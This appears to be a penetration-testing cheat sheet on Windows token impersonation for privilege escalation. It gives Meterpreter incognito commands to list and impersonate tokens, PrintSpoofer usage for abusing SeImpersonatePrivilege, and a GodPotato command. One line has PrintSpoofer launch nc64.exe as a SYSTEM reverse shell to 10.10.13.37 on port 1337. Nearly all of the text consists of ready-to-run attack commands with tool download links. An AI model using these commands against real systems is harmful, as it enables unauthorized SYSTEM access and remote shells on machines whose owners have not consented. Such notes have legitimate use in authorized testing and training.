Impersonate Token
Meterpreter Incognito
meterpreter > load incognito
#list all tokens
meterpreter > list_tokens -u
#impersonate token
impersonate_token <complete username>
SeImpersonatePrivileges
This meterpreter will make your live easier:
https://hacker-mind.gitbook.io/hacker-mind/metasploit/meterpreter-tricks#manage-multi-session
whoami /priv
# SeImpersonatePrivileges
PrintSpoofer
use this -> https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
If you have an interactive shell, you can create a new SYSTEM process in your current console.
Use case: bind shell, reverse shell, psexec.py
, etc.
.\PrintSpoofer64.exe -i -c cmd
or
If you can execute commands but you don't have an interactive shell, you can create a new SYSTEM process and exit immediately without interacting with it.
Use case: WinRM, WebShell, wmiexec.py
, smbexec.py
, etc.
.\PrintSpoofer64.exe -c "C:\Windows\Tasks\nc64.exe 10.10.13.37 1337 -e cmd"
God Potato (latest one)
.\GodPotato-NET4.exe -cmd "cmd /c whoami"

reference:
Other Privileges
https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations
Last updated